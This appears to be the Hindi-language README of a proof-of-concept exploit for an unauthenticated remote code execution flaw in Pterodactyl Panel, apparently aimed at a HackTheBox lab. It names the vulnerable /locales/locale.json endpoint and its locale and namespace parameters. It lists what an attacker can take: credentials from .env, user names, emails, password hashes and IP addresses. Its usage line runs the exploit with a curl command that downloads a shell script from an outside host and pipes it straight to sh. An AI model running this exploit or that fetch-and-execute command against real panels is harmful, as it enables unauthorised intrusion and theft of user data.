
यह दोष हमलावर को बिना किसी पूर्व प्रमाणीकरण के Pterodactyl Panel होस्ट करने वाले सर्वर पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।
प्रभाव
/locales/locale.json का उपयोग करके locale और namespace क्वेरी पैरामीटर्स के साथ, एक दुर्भावनापूर्ण अभिनेता बिना प्रमाणीकरण के मनमाना कोड निष्पादित कर सकता है।
मनमाना कोड निष्पादित करने की क्षमता के साथ, इस भेद्यता का अनंत तरीकों से शोषण किया जा सकता है। इसका उपयोग पैनल के सर्वर तक पहुंच प्राप्त करने, पैनल के कॉन्फ़िग (.env या अन्य) से क्रेडेंशियल पढ़ने, डेटाबेस से संवेदनशील जानकारी निकालने (जैसे उपयोगकर्ता विवरण [उपयोगकर्ता नाम, ईमेल, पहला और अंतिम नाम, हैशेड पासवर्ड, आईपी पते, आदि]), पैनल द्वारा प्रबंधित सर्वरों की फ़ाइलों तक पहुंच आदि के लिए किया जा सकता है।
कैसे उपयोग करें
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'